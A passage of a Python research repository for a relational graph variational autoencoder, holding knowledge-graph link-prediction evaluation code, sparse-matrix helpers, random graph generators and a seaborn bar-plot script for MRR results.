cho = np.where(e[s[i],o[i],:] == 1)[0]
if cho.size > 0:
r = np.array(np.random.choice(cho[0]))
else:
print('No attribute prediction for node {},{}. Graph inconsistent!'.format(s[i],o[i]))
break
if r.size > 0:
triple = (f[s[i]], r, f[o[i]])
triples.append(triple)
return triples
def translate_triple(triples, i2n, i2r, entity_dict=None):
"""
Translate an indexed triple back to text.
Args:
....
"""
triples_text = list()
for triple in triples:
(s,r,o) = triple
if entity_dict is None:
triples_text.append((i2n[s], i2r[r], i2n[o]))
else:
triples_text.append((entity_dict[i2n[s]][0], i2r[r], entity_dict[i2n[o]][0]))
return triples_text
def batch_t2m(batch, n: int, n_e: int, n_r: int):
"""
Converts batches of triples into matrix form.
:param batch: batch of triples
:param n: number of triples per. matrix
:param n_e: total node count.
:param n_r: total edge attribute count.
:return: the batched matrices A, E, F.
"""
# This condition is needed for batch size = 1.
if len(batch.shape) > 1:
bs = batch.shape[0]
else:
bs = 1
batch = batch.unsqueeze(0)
batch_a = list()
batch_e = list()
batch_f = list()
for ii in range(bs):
(A, E, F) = triple2matrix(batch[ii:ii+n,:], n_e, n_r) # TODO adopt this to bigger n
assert A.shape[1] != 1
batch_a.append(A)
batch_e.append(E)
batch_f.append(F)
return [torch.cat(batch_a, dim=0),torch.cat(batch_e, dim=0),torch.cat(batch_f, dim=0)]
###################### For actual link prediction ###########################
tics = []
def prt(verbose, *args, **kwargs):
if verbose:
print(*args, **kwargs)
def filter(rawtriples, all, true):
filtered = []
for triple in rawtriples:
if triple == true or not triple in all:
filtered.append(triple)
return filtered
def filter_scores_(scores, batch, truedicts, head=True):
"""
Filters a score matrix by setting the scores of known non-target true triples to -inf
:param scores:
:param batch:
:param truedicts:
:param head:
:return:
"""
indices = [] # indices of triples whose scores should be set to -infty
heads, tails = truedicts
for i, (s, p, o) in enumerate(batch):
s, p, o = triple = (s.item(), p.item(), o.item())
if head:
indices.extend([(i, si) for si in heads[p, o] if si != s])
else:
indices.extend([(i, oi) for oi in tails[s, p] if oi != o])
#-- We add the indices of all know triples except the one corresponding to the target triples.
indices = torch.tensor(indices, device=d())
if indices.shape[0] != 0:
scores[indices[:, 0], indices[:, 1]] = float('-inf')
def truedicts(all):
"""
Generates a pair of dictionairies containg all true tail and head completions.
:param all: A list of 3-tuples containing all known true triples
:return:
"""
heads, tails = {(p, o) : [] for _, p, o in all}, {(s, p) : [] for s, p, _ in all}
for s, p, o in all:
heads[p, o].append(s)
tails[s, p].append(o)
return heads, tails
def eval(model : nn.Module, valset, truedicts, n, r, batch_size=16, hitsat=[1, 3, 10], filter_candidates=True, verbose=False, elbo=True):
"""
Evaluates a triple scoring model. Does the sorting in a single, GPU-accelerated operation.
:param model:
:param val_set:
:param alltriples:
:param filter:
:param eblo: If true, use full elbo as loss. Else just the reconstruction loss.
:return:
"""
rng = tqdm.trange if verbose else range
heads, tails = truedicts
tforward = tfilter = tsort = 0.0
tic()
ranks = []
# head = False # TODO change this back later to do both head tail
for head in tqdm.tqdm([True, False], desc='LP Head, Tail', leave=True): # head or tail prediction
for fr in rng(0, valset.shape[0], batch_size, desc='Validation Set', leave=True):
to = min(fr + batch_size, valset.shape[0])
wandb.log({'batch': fr, 'set_size': valset.shape[0], 'head': 1 if head else 0})
batch = valset[fr:to, :].to(device=d())
bn, _ = batch.size()
# compute the full score matrix (filter later)
bases = batch[:, 1:] if head else batch[:, :2]
targets = batch[:, 0] if head else batch[:, 2]
# collect the triples for which to compute scores
bexp = bases.view(bn, 1, 2).expand(bn, n, 2)
ar = torch.arange(n, device=d()).view(1, n, 1).expand(bn, n, 1)
toscore = torch.cat([ar, bexp] if head else [bexp, ar], dim=2)
assert toscore.size() == (bn, n, 3)
tic()
scores = list()
for ii in rng(0, bn, 1, desc='Valset Batch', leave=False):
batch_scores = list()
for iii in rng(0, n, batch_size, desc='Batch of Batch', leave=False):
tt = min(iii + batch_size, toscore.shape[1])
tpg = model.n -1 # number of triples per graph
sub_batch = batch_t2m(toscore[ii, iii:tt, :].squeeze(), tpg, n, r)
if elbo:
loss = - model.elbo(sub_batch)
else:
prediction = model.forward(sub_batch)
loss = model.reconstruction_loss(sub_batch, prediction)
batch_scores.append(loss)
scores.append(torch.cat(batch_scores, dim=0).unsqueeze(0))
scores = torch.cat(scores, dim=0).squeeze()
tforward += toc()
assert scores.size() == (bn, n)
# filter out the true triples that aren't the target
tic()
filter_scores_(scores, batch, truedicts, head=head)
tfilter += toc()
# Select the true scores, and count the number of values larger than than
true_scores = scores[torch.arange(bn, device=d()), targets]
raw_ranks = torch.sum(scores > true_scores.view(bn, 1), dim=1, dtype=torch.long)
# -- This is the "optimistic" rank (assuming it's sorted to the front of the ties)
num_ties = torch.sum(scores == true_scores.view(bn, 1), dim=1, dtype=torch.long)
# Account for ties (put the true example halfway down the ties)
branks = raw_ranks + (num_ties - 1) // 2
ranks.extend((branks + 1).tolist())
hits_temp = []
for k in hitsat:
hits_temp.append(sum([1.0 if rank <= k else 0.0 for rank in ranks]) / len(ranks))
wandb.log({'MRR_temp': sum([1.0/rank for rank in ranks])/len(ranks),
'Hits_1_temp': hits_temp[0], 'Hits_3_temp': hits_temp[1], 'Hits_10_temp': hits_temp[2],
'test_set': fr, 'head': 1 if head else 0})
mrr = sum([1.0/rank for rank in ranks])/len(ranks)
hits = []
for k in hitsat:
hits.append(sum([1.0 if rank <= k else 0.0 for rank in ranks]) / len(ranks))
# if verbose:
# print(f'time {toc():.4}s total, {tforward:.4}s forward, {tfilter:.4}s filtering, {tsort:.4}s sorting.')
wandb.log({'MRR': mrr, 'Hits_1': hits[0], 'Hits_3': hits[1], 'Hits_10': hits[2]})
return mrr, tuple(hits), ranks
def tic():
tics.append(time.time())
def toc():
if len(tics)==0:
return None
else:
return time.time()-tics.pop()
def mask_(matrices, maskval=0.0, mask_diagonal=True):
"""
Masks out all values in the given batch of matrices where i <= j holds,
i < j if mask_diagonal is false
In place operation
:param tns:
:return:
"""
b, h, w = matrices.size()
indices = torch.triu_indices(h, w, offset=0 if mask_diagonal else 1)
matrices[:, indices[0], indices[1]] = maskval
def d(tensor=None):
"""
Returns a device string either for the best available device,
or for the device corresponding to the argument
:param tensor:
:return:
"""
if tensor is None:
return 'cuda' if torch.cuda.is_available() else 'cpu'
if type(tensor) == bool:
return 'cuda'if tensor else 'cpu'
return 'cuda' if tensor.is_cuda else 'cpu'
def here(subpath=None):
"""
:return: the path in which the package resides (the directory containing the 'kgmodels' dir)
"""
if subpath is None:
return os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))
return os.path.abspath(os.path.join(os.path.dirname(__file__), '../..', subpath))
def adj(edges, num_nodes, cuda=False, vertical=True):
"""
Computes a sparse adjacency matrix for the given graph (the adjacency matrices of all
relations are stacked vertically).
:param edges: Dictionary representing the edges
:param i2r: list of relations
:param i2n: list of nodes
:return: sparse tensor
"""
ST = torch.cuda.sparse.FloatTensor if cuda else torch.sparse.FloatTensor
r, n = len(edges.keys()), num_nodes
size = (r*n, n) if vertical else (n, r*n)
from_indices = []
upto_indices = []
for rel, (fr, to) in edges.items():
offset = rel * n
if vertical:
fr = [offset + f for f in fr]
else:
to = [offset + t for t in to]
from_indices.extend(fr)
upto_indices.extend(to)
indices = torch.tensor([from_indices, upto_indices], dtype=torch.long, device=d(cuda))
assert indices.size(1) == sum([len(ed[0]) for _, ed in edges.items()])
assert indices[0, :].max() < size[0], f'{indices[0, :].max()}, {size}, {r}, {edges.keys()}'
assert indices[1, :].max() < size[1], f'{indices[1, :].max()}, {size}, {r}, {edges.keys()}'
return indices.t(), size
def adj_triples(triples, num_nodes, num_rels, cuda=False, vertical=True):
"""
Computes a sparse adjacency matrix for the given graph (the adjacency matrices of all
relations are stacked vertically).
:param edges: List representing the triples
:param i2r: list of relations
:param i2n: list of nodes
:return: sparse tensor
"""
r, n = num_rels, num_nodes
size = (r*n, n) if vertical else (n, r*n)
from_indices = []
upto_indices = []
for fr, rel, to in triples:
offset = rel.item() * n
if vertical:
fr = offset + fr.item()
else:
to = offset + to.item()
from_indices.append(fr)
upto_indices.append(to)
tic()
indices = torch.tensor([from_indices, upto_indices], dtype=torch.long, device=d(cuda))
assert indices.size(1) == len(triples)
assert indices[0, :].max() < size[0], f'{indices[0, :].max()}, {size}, {r}'
assert indices[1, :].max() < size[1], f'{indices[1, :].max()}, {size}, {r}'
return indices.t(), size
def adj_triples_tensor(triples, num_nodes, num_rels, vertical=True):
"""
Computes a sparse adjacency matrix for the given graph (the adjacency matrices of all
relations are stacked vertically).
:param edges: List representing the triples
:param i2r: list of relations
:param i2n: list of nodes
:return: sparse tensor
"""
assert triples.dtype == torch.long
r, n = num_rels, num_nodes
size = (r*n, n) if vertical else (n, r*n)
fr, to = triples[:, 0], triples[:, 2]
offset = triples[:, 1] * n
if vertical:
fr = offset + fr
else:
to = offset + to
indices = torch.cat([fr[:, None], to[:, None]], dim=1)
assert indices.size(0) == triples.size(0)
assert indices[:, 0].max() < size[0], f'{indices[0, :].max()}, {size}, {r}'
assert indices[:, 1].max() < size[1], f'{indices[1, :].max()}, {size}, {r}'
return indices, size
def sparsemm(use_cuda):
"""
:param use_cuda:
:return:
"""
return SparseMMGPU.apply if use_cuda else SparseMMCPU.apply
class SparseMMCPU(torch.autograd.Function):
"""
Sparse matrix multiplication with gradients over the value-vector
Does not work with batch dim.
"""
@staticmethod
def forward(ctx, indices, values, size, xmatrix):
# print(type(size), size, list(size), intlist(size))
# print(indices.size(), values.size(), torch.Size(intlist(size)))
matrix = torch.sparse.FloatTensor(indices, values, torch.Size(intlist(size)))
ctx.indices, ctx.matrix, ctx.xmatrix = indices, matrix, xmatrix
return torch.mm(matrix, xmatrix)
@staticmethod
def backward(ctx, grad_output):
grad_output = grad_output.data
# -- this will break recursive autograd, but it's the only way to get grad over sparse matrices
i_ixs = ctx.indices[0,:]
j_ixs = ctx.indices[1,:]
output_select = grad_output[i_ixs, :]
xmatrix_select = ctx.xmatrix[j_ixs, :]
grad_values = (output_select * xmatrix_select).sum(dim=1)
grad_xmatrix = torch.mm(ctx.matrix.t(), grad_output)
return None, Variable(grad_values), None, Variable(grad_xmatrix)
class SparseMMGPU(torch.autograd.Function):
"""
Sparse matrix multiplication with gradients over the value-vector
Does not work with batch dim.
"""
@staticmethod
def forward(ctx, indices, values, size, xmatrix):
# print(type(size), size, list(size), intlist(size))
matrix = torch.cuda.sparse.FloatTensor(indices, values, torch.Size(intlist(size)))
ctx.indices, ctx.matrix, ctx.xmatrix = indices, matrix, xmatrix
return torch.mm(matrix, xmatrix)
@staticmethod
def backward(ctx, grad_output):
grad_output = grad_output.data
# -- this will break recursive autograd, but it's the only way to get grad over sparse matrices
i_ixs = ctx.indices[0,:]
j_ixs = ctx.indices[1,:]
output_select = grad_output[i_ixs]
xmatrix_select = ctx.xmatrix[j_ixs]
grad_values = (output_select * xmatrix_select).sum(dim=1)
grad_xmatrix = torch.mm(ctx.matrix.t(), grad_output)
return None, Variable(grad_values), None, Variable(grad_xmatrix)
def spmm(indices, values, size, xmatrix):
cuda = indices.is_cuda
sm = sparsemm(cuda)
return sm(indices.t(), values, size, xmatrix)
class Lambda(nn.Module):
def __init__(self, lambd):
super(Lambda, self).__init__()
self.lambd = lambd
def forward(self, x):
return self.lambd(x)
class Debug(nn.Module):
def __init__(self, lambd):
super(Debug, self).__init__()
self.lambd = lambd
def forward(self, x):
self.lambd(x)
return x
def batchmm(indices, values, size, xmatrix, cuda=None):
"""
Multiply a batch of sparse matrices (indices, values, size) with a batch of dense matrices (xmatrix)
:param indices:
:param values:
:param size:
:param xmatrix:
:return:
"""
if cuda is None:
cuda = indices.is_cuda
b, n, r = indices.size()
dv = 'cuda' if cuda else 'cpu'
height, width = size
size = torch.tensor(size, device=dv, dtype=torch.long)
bmult = size[None, None, :].expand(b, n, 2)
m = torch.arange(b, device=dv, dtype=torch.long)[:, None, None].expand(b, n, 2)
bindices = (m * bmult).view(b*n, r) + indices.view(b*n, r)
bfsize = Variable(size * b)
bvalues = values.contiguous().view(-1)
b, w, z = xmatrix.size()
bxmatrix = xmatrix.view(-1, z)
sm = sparsemm(cuda)
result = sm(bindices.t(), bvalues, bfsize, bxmatrix)
return result.view(b, height, -1)
def sum_sparse(indices, values, size, row=True):
"""
Sum the rows or columns of a sparse matrix, and redistribute the
results back to the non-sparse row/column entries
Arguments are interpreted as defining sparse matrix. Any extra dimensions
are treated as batch.
:return:
"""
assert len(indices.size()) == len(values.size()) + 1
if len(indices.size()) == 2:
# add batch dim
indices = indices[None, :, :]
values = values[None, :]
bdims = None
else:
# fold up batch dim
bdims = indices.size()[:-2]
k, r = indices.size()[-2:]
assert bdims == values.size()[:-1]
assert values.size()[-1] == k
indices = indices.view(-1, k, r)
values = values.view(-1, k)
b, k, r = indices.size()
if not row:
# transpose the matrix
indices = torch.cat([indices[:, :, 1:2], indices[:, :, 0:1]], dim=2)
size = size[1], size[0]
ones = torch.ones((size[1], 1), device=d(indices))
s, _ = ones.size()
ones = ones[None, :, :].expand(b, s, 1).contiguous()
# print(indices.size(), values.size(), size, ones.size())
# sys.exit()
sums = batchmm(indices, values, size, ones) # row/column sums
bindex = torch.arange(b, device=d(indices))[:, None].expand(b, indices.size(1))
sums = sums[bindex, indices[:, :, 0], 0]
if bdims is None:
return sums.view(k)
return sums.view(*bdims + (k,))
def intlist(tensor):
"""
A slow and stupid way to turn a tensor into an iterable over ints
:param tensor:
:return:
"""
if type(tensor) is list or type(tensor) is tuple:
return tensor
tensor = tensor.squeeze()
assert len(tensor.size()) == 1
s = tensor.size()[0]
l = [None] * s
for i in range(s):
l[i] = int(tensor[i])
return l
def simple_normalize(indices, values, size, row=True, method='softplus', cuda=torch.cuda.is_available()):
"""
Simple softmax-style normalization with
:param indices:
:param values:
:param size:
:param row:
:return:
"""
epsilon = 1e-7
if method == 'softplus':
values = F.softplus(values)
elif method == 'abs':
values = values.abs()
elif method == 'relu':
values = F.relu(values)
else:
raise Exception(f'Method {method} not recognized')
sums = sum_sparse(indices, values, size, row=row)
return (values/(sums + epsilon))
# -- stable(ish) softmax
def logsoftmax(indices, values, size, its=10, p=2, method='iteration', row=True, cuda=torch.cuda.is_available()):
"""
Row or column log-softmaxes a sparse matrix (using logsumexp trick)
:param indices:
:param values:
:param size:
:param row:
:return:
"""
epsilon = 1e-7
if method == 'naive':
values = values.exp()
sums = sum_sparse(indices, values, size, row=row)
return (values/(sums + epsilon)).log()
if method == 'pnorm':
maxes = rowpnorm(indices, values, size, p=p)
elif method == 'iteration':
maxes = itmax(indices, values, size,its=its, p=p)
else:
raise Exception('Max method {} not recognized'.format(method))
mvalues = torch.exp(values - maxes)
sums = sum_sparse(indices, mvalues, size, row=row) # row/column sums]
return mvalues.log() - sums.log()
def rowpnorm(indices, values, size, p, row=True):
"""
Row or column p-norms a sparse matrix
:param indices:
:param values:
:param size:
:param row:
:return:
"""
pvalues = torch.pow(values, p)
sums = sum_sparse(indices, pvalues, size, row=row)
return torch.pow(sums, 1.0/p)
def itmax(indices, values, size, its=10, p=2, row=True):
"""
Iterative computation of row max
:param indices:
:param values:
:param size:
:param p:
:param row:
:param cuda:
:return:
"""
epsilon = 0.00000001
# create an initial vector with all values made positive
# weights = values - values.min()
weights = F.softplus(values)
weights = weights / (sum_sparse(indices, weights, size) + epsilon)
# iterate, weights converges to a one-hot vector
for i in range(its):
weights = weights.pow(p)
sums = sum_sparse(indices, weights, size, row=row) # row/column sums
weights = weights/sums
return sum_sparse(indices, values * weights, size, row=row)
def schedule(epoch, schedule):
"""
Provides a piecewise linear schedule for some parameter
:param epoch:
:param schedule: Dictionary of integer key and floating point value pairs
:return:
"""
schedule = [(k, v) for k, v in schedule.items()]
schedule = sorted(schedule, key = lambda x : x[0])
for i, (k, v) in enumerate(schedule):
if epoch <= k:
if i == 0:
return v
else:
# interpolate between i-1 and 1
kl, vl = schedule[i-1]
rng = k - kl
prop = (epoch - kl) / rng
propl = 1.0 - prop
return propl * vl + prop * v
return v
def contains_nan(input):
if (not isinstance(input, torch.Tensor)) and isinstance(input, Iterable):
for i in input:
if contains_nan(i):
return True
return False
else:
return bool(torch.isnan(input).sum() > 0)
#
def contains_inf(input):
if (not isinstance(input, torch.Tensor)) and isinstance(input, Iterable):
for i in input:
if contains_inf(i):
return True
return False
else:
return bool(torch.isinf(input).sum() > 0)
def block_diag(m):
"""
courtesy of: https://gist.github.com/yulkang/2e4fc3061b45403f455d7f4c316ab168
Make a block diagonal matrix along dim=-3
EXAMPLE:
block_diag(torch.ones(4,3,2))
should give a 12 x 8 matrix with blocks of 3 x 2 ones.
Prepend batch dimensions if needed.
You can also give a list of matrices.
:type m: torch.Tensor, list
:rtype: torch.Tensor
"""
if type(m) is list:
m = torch.cat([m1.unsqueeze(-3) for m1 in m], -3)
dim = m.dim()
n = m.shape[-3]
siz0 = m.shape[:-3]
siz1 = m.shape[-2:]
m2 = m.unsqueeze(-2)
eye = attach_dim(torch.eye(n, device=d(m)).unsqueeze(-2), dim - 3, 1)
return (m2 * eye).reshape(
siz0 + torch.Size(torch.tensor(siz1) * n)
)
def attach_dim(v, n_dim_to_prepend=0, n_dim_to_append=0):
return v.reshape(
torch.Size([1] * n_dim_to_prepend)
+ v.shape
+ torch.Size([1] * n_dim_to_append))
def prod(array):
p = 1
for e in array:
p *= e
return p
def batch(model, *inputs, batch_size=16, **kwargs):
"""
Batch forward.
:param model: multiple input, single output
:param inputs: should all have the same 0 dimension
:return:
"""
n = inputs[0].size(0)
outs = []
for fr in range(0, n, batch_size):
to = min(n, fr + batch_size)
batches = [inp[fr:to] for inp in inputs]
if torch.cuda.is_available():
batches = [btc.cuda() for btc in batches]
outs.append(model(*batches, **kwargs).cpu())
return torch.cat(outs, dim=0)
def get_slug(s):
"""
Returns a simplified version of the given string that can serve as a filename or directory name.
:param s:
:return:
"""
s = str(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
```
#### File: rgvae/utils/utils.py
```python
import numpy as np
from scipy.optimize import linear_sum_assignment
import torch
from tqdm import tqdm
def linear_sum_assignment_with_inf(cost_matrix):
"""
scipy linear sum assignment for cost matrices with inf or -inf.
Source: https://github.com/scipy/scipy/issues/6900
"""
cost_matrix = np.asarray(cost_matrix)
min_inf = np.isneginf(cost_matrix).any()
max_inf = np.isposinf(cost_matrix).any()
if min_inf and max_inf:
raise ValueError("matrix contains both inf and -inf")
if min_inf or max_inf:
values = cost_matrix[~np.isinf(cost_matrix)]
m = values.min()
M = values.max()
n = min(cost_matrix.shape)
# strictly positive constant even when added
# to elements of the cost matrix
positive = n * (M - m + np.abs(M) + np.abs(m) + 1)
if max_inf:
place_holder = (M + (n - 1) * (M - m)) + positive
cost_matrix[np.isinf(cost_matrix)] = place_holder
if min_inf:
place_holder = (m + (n - 1) * (m - M)) - positive
cost_matrix[np.isinf(cost_matrix)] = place_holder
return linear_sum_assignment(cost_matrix)
def no_zero(t):
"""
This function replaces all zeros in a tensor with ones.
This allows us to take the logarithm and then sum over all values in the matrix.
Args:
t: tensor to be replaced
returns:
t: tensor with ones instead of zeros.
"""
t[t==0] = 1.
return t
def check_adj_logic(sample):
"""
Checks if the generated sample adheres to the logic, that edge attributes can only exist where the adjacency matrix indicates an edge.
Args:
sample: A binomial sample of a predicted graph.
Output:
Not sure yet.
"""
A, E, F = sample
E_check = torch.sum(E, -1)
E_check[E_check > 0] = 1.
bool_check = A[A == E_check]
print(A == E_check)
def mk_sparse_graph_ds(n: int, e: int, d_e: int, batch_size: int=1, batches: int=1):
"""
Function to create random graph dataet in sparse matrix form.
We generate the each subject (s), relation (r), object (o) vector seperate and then stack and permute them.
Output shape is [batches*(bs,[s,r,o])].
Args:
n: number of nodes.
e: number of edges between nodes.
d_e: number of edge attributes.
batch_size: well, the batch size.
batches: optional for unicorn dust.
"""
ds = list()
for _ in range(batches):
s = np.random.choice(n, (batch_size, e))
r = np.random.choice(d_e, (batch_size, e))
o = np.random.choice(n, (batch_size, e))
ds.append(np.stack([s,r,o], axis=-1))
return ds
def mk_cnstrnd_graph(n: int, e: int, d_e: int, d_n: int, batch_size: int=1, self_loop: bool=False):
"""
Returns a random Graph constrained on the number of nodes and edges.
Args:
n: number of nodes. defines the shape of the adjacency matrix.
e: number of edges, this is the constrain
d_e: number of edge-attributes.
d_n: number of node-attributes.
batch_size: well.. the batch size.
self_loop: Set the diagonal of the adj matrix to one.
"""
lambda_choice = lambda x,y: np.random.choice(x, y, replace=False)
a_choice = np.append(np.ones(e, dtype=int), np.zeros(n*n - e, dtype=int))
A = np.vstack([lambda_choice(a_choice,n*n) for _ in range(batch_size)])
A = A.reshape((batch_size,n,n))
if self_loop:
one_diag = np.eye(n, dtype=int)
one_diag = np.tile(np.expand_dims(one_diag, axis=0), (batch_size, 1, 1))
A = A + one_diag
# The idea here is that an edge attribute can only exist where an edge is. Further if there is an edge we want at leat one attribute to be 1.
E = np.zeros((batch_size,n,n,d_e), dtype=int)
E[:,:,:,0] = A.copy()
e_choice = np.append(np.ones(d_e, dtype=int), np.zeros(d_e-1, dtype=int))
E[A==1,:] = np.vstack([lambda_choice(e_choice, d_e) for _ in range(batch_size*e)])
f_choice = np.append(np.ones(1, dtype=int), np.zeros(d_n-1, dtype=int))
F = np.eye(d_n)[np.random.choice(d_n,batch_size*n)].reshape((batch_size,n,d_n))
return A, E, F
def mk_random_graph(n: int, d_e: int, d_n: int, batch_size: int=1, target: bool=True):
"""
This function creates a random relation graph.
Consisting of an adjacency, an edge-attribute and a node-attribute matrix.
If we choose to generate a target graph, the graph values are deterministic.
Otherwise we are generating a prediction graph with continuous values.
returns a list of 3 numpy matrices. TODO: F = A + 3rd dim
Args:
n: number of nodes. defines the shape of the adjacency matrix.
d_e: number of edge-attributes.
d_n: number of node-attributes.
batch_size: well.. the batch size.
target: generates a target graph when True, a prediction graph otherwise.
"""
if target:
A = np.random.randint(2, size=(batch_size,n,n))
E = np.random.randint(2, size=(batch_size,n,n,d_e))
F = np.random.randint(2, size=(batch_size,n,d_n))
else:
A = np.random.normal(size=(batch_size,k,k))
E = np.random.normal(size=(batch_size,k,k,d_e))
F = np.random.normal(size=(batch_size,k,d_n))
return (A, E, F)
def mk_graph_ds(n: int, d_e: int, d_n: int, e: int, constrained: bool=True, batches: int=1, batch_size: int=1,target: bool=True):
"""
Forbatches.
Args:
n: number of nodes. defines the shape of the adjacency matrix.
e: number of edges, if constrained.
d_e: number of edge-attributes.
d_n: number of node-attributes.
batch_size: well.. the batch size.
target: generates a target graph when True, a prediction graph otherwise.
"""
ds = list()
if constrained:
for i in tqdm(range(batches), desc='Creating Dataset', total=batches):
ds.append(mk_cnstrnd_graph(n,e,d_e,d_n,batch_size))
else:
for i in tqdm(range(batches), desc='Creating Dataset', total=batches):
ds.append(mk_random_graph(n,d_e,d_n,batch_size,target))
return ds
def torch_batch_dot(M1, M2, dim1, dim2):
"""
Torch implementation of the batch dot matrix multiplication.
Only for matrices of shape (bs,n,n,1) and (bs,k,k,1).
Returns matrix of shape (bs,n,n,k,k).
"""
M1_shape = M1.shape
M2_shape = M2.shape
bs = M1_shape[0]
M3 = torch.matmul(M1.view(bs,-1,M1_shape[dim1]), M2.view(bs,M2_shape[dim2],-1)).view(bs,M1_shape[1],M1_shape[2],M2_shape[1],M2_shape[2])
return M3
def torch_batch_dot_v2(M1, M2, dim1, dim2, return_shape):
"""
Torch implementation of the batch dot matrix multiplication.
Args:
return_shape: The shape of the returned matrix, including batch size.
"""
M1_shape = M1.shape
M2_shape = M2.shape
bs = M1_shape[0]
M3 = torch.matmul(M1.view(bs,-1,M1_shape[dim1]), M2.view(bs,M2_shape[dim2],-1)).view(return_shape)
return M3
def replace_nan(t):
"""
Function to replace NaNs.
"""
return torch.where(torch.isnan(t), torch.zeros_like(t), t)
def replace_inf(t):
"""
Function to replace NaNs.
"""
return torch.where(torch.isinf(t), torch.zeros_like(t), t)
def add_e7(t):
"""
Function to add a very small value to each element, to avoid inf errors when taking the logarithm.
"""
return t + torch.ones_like(t) * 1e-7
def sum_sparse(indices, values, size, row_normalisation=True, device='cpu'):
"""
Sum the rows or columns of a sparse matrix, and redistribute the
results back to the non-sparse row/column entries
Arguments are interpreted as defining sparse matrix.
Source: https://github.com/pbloem/gated-rgcn/blob/1bde7f28af8028f468349b2d760c17d5c908b58b/kgmodels/util/util.py#L304
"""
assert len(indices.size()) == len(values.size()) + 1
k, r = indices.size()
if not row_normalisation:
# Transpose the matrix for column-wise normalisation
indices = torch.cat([indices[:, 1:2], indices[:, 0:1]], dim=1)
size = size[1], size[0]
ones = torch.ones((size[1], 1), device=device)
if device == 'cuda':
values = torch.cuda.sparse.FloatTensor(indices.t(), values, torch.Size(size))
else:
values = torch.sparse.FloatTensor(indices.t(), values, torch.Size(size))
sums = torch.spmm(values, ones)
sums = sums[indices[:, 0], 0]
return sums.view(k)
def generate_inverses(triples, num_rels):
""" Generates nverse relations """
# Swap around head and tail. Create new relation ids for inverse relations.
inverse_relations = torch.cat([triples[:, 2, None], triples[:, 1, None] + num_rels, triples[:, 0, None]], dim=1)
assert inverse_relations.size() == triples.size()
return inverse_relations
def generate_self_loops(triples, num_nodes, num_rels, self_loop_keep_prob, device='cpu'):
""" Generates self-loop triples and then applies edge dropout """
# Create a new relation id for self loop relation.
all = torch.arange(num_nodes, device=device)[:, None]
id = torch.empty(size=(num_nodes, 1), device=device, dtype=torch.long).fill_(2*num_rels)
self_loops = torch.cat([all, id, all], dim=1)
assert self_loops.size() == (num_nodes, 3)
# Apply edge dropout
mask = torch.bernoulli(torch.empty(size=(num_nodes,), dtype=torch.float, device=device).fill_(
self_loop_keep_prob)).to(torch.bool)
self_loops = self_loops[mask, :]
return torch.cat([triples, self_loops], dim=0)
def stack_matrices(triples, num_nodes, num_rels, vertical_stacking=True, device='cpu'):
"""
Computes a sparse adjacency matrix for the given graph (the adjacency matrices of all
relations are stacked vertically).
"""
assert triples.dtype == torch.long
r, n = num_rels, num_nodes
size = (r * n, n) if vertical_stacking else (n, r * n)
fr, to = triples[:, 0], triples[:, 2]
offset = triples[:, 1] * n
if vertical_stacking:
fr = offset + fr
else:
to = offset + to
indices = torch.cat([fr[:, None], to[:, None]], dim=1).to(device)
assert indices.size(0) == triples.size(0)
assert indices[:, 0].max() < size[0], f'{indices[0, :].max()}, {size}, {r}'
assert indices[:, 1].max() < size[1], f'{indices[1, :].max()}, {size}, {r}'
return indices, size
def block_diag(m):
"""
Source: https://gist.github.com/yulkang/2e4fc3061b45403f455d7f4c316ab168
Make a block diagonal matrix along dim=-3
EXAMPLE:
block_diag(torch.ones(4,3,2))
should give a 12 x 8 matrix with blocks of 3 x 2 ones.
Prepend batch dimensions if needed.
You can also give a list of matrices.
"""
device = 'cuda' if m.is_cuda else 'cpu' # Note: Using cuda status of m as proxy to decide device
if type(m) is list:
m = torch.cat([m1.unsqueeze(-3) for m1 in m], -3)
dim = m.dim()
n = m.shape[-3]
siz0 = m.shape[:-3]
siz1 = m.shape[-2:]
m2 = m.unsqueeze(-2)
eye = attach_dim(torch.eye(n, device=device).unsqueeze(-2), dim - 3, 1)
return (m2 * eye).reshape(
siz0 + torch.Size(torch.tensor(siz1) * n)
)
def attach_dim(v, n_dim_to_prepend=0, n_dim_to_append=0):
return v.reshape(
torch.Size([1] * n_dim_to_prepend)
+ v.shape
+ torch.Size([1] * n_dim_to_append))
``` |
{
"source": "3lLobo/Thesis",
"score": 3
} |
#### File: Thesis/graphs/plot_graph_hyp_bar.py
```python
import matplotlib
import matplotlib.pylab as plt
import os
from matplotlib.pyplot import title
import seaborn as sns
import pandas as pd
def plot_graph(data, metric, plot_name, figsize):
"""
Plot the input data to latex compatible .pgg format.
"""
sns.set()
sns.set_context("paper")
sns.set(rc={'figure.figsize':figsize})
palette = 'summer' #['copper_r', 'BuPu'afmhot_r cool_r] https://medium.com/@morganjonesartist/color-guide-to-seaborn-palettes-da849406d44f
fig, ax = plt.subplots(figsize=figsize)
if metric == 'mrr':
sns.set_theme(style="whitegrid")
g = sns.catplot(data=data, kind="bar", x='beta', y=metric, ci='sd', palette=palette, height=figsize[1], aspect=figsize[0]/figsize[1])
g.despine(left=True)
g.set(ylim=(0, .1))
# sns.barplot(ax=ax, data=data, y=metric, x="beta", palette=palette)
plt.xlabel(r'$\beta$')
plt.ylabel('MRR')
# plt.ylim(0, .1)
# plt.title(t_name.replace('_', ' ').title())
# plt.show()
folder = os.path.dirname(os.path.abspath(__file__)) + '/plots/'
if not os.path.isdir(folder):
os.makedirs(folder)
# plt.savefig(folder + '{}.pgf'.format(plot_name))
plt.savefig(folder + '{}.png'.format(plot_name), bbox_inches='tight')
if __name__ == "__main__":
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
textwidth_in = 6.69423
figsize = [textwidth_in * 0.8, textwidth_in * .5]
for ds in ['fb', 'wn']:
for metric in ['mrr']:
plot_name = 'beta_{}_{}'.format(metric, ds)
beta_list = [0,1,10,100]
df_list = list()
for beta in beta_list:
df_1 = pd.read_csv('graphs/data/beta/beta_{}_all_b{}.csv'.format(ds, beta))
df_1.drop([col for col in df_1.columns if ('__MIN' in col or '__MAX' in col)], axis=1, inplace=True)
col_dict = dict(zip(df_1.columns, ['step','loss','mrr','epoch']))
df_1 = df_1.rename(columns=col_dict)
df_1.fillna(method='bfill', inplace=True)
df_1['beta'] = [str(beta)] * len(df_1)
df_list.append(df_1)
df_plot = pd.concat(df_list, axis=0)
print('Total {}'.format(len(df_plot)))
# df_plot.mrr = df_plot.mrr * 500
# df2.to_csv('beta_plot.csv')
plot_graph(df_plot, metric, plot_name, figsize)
```
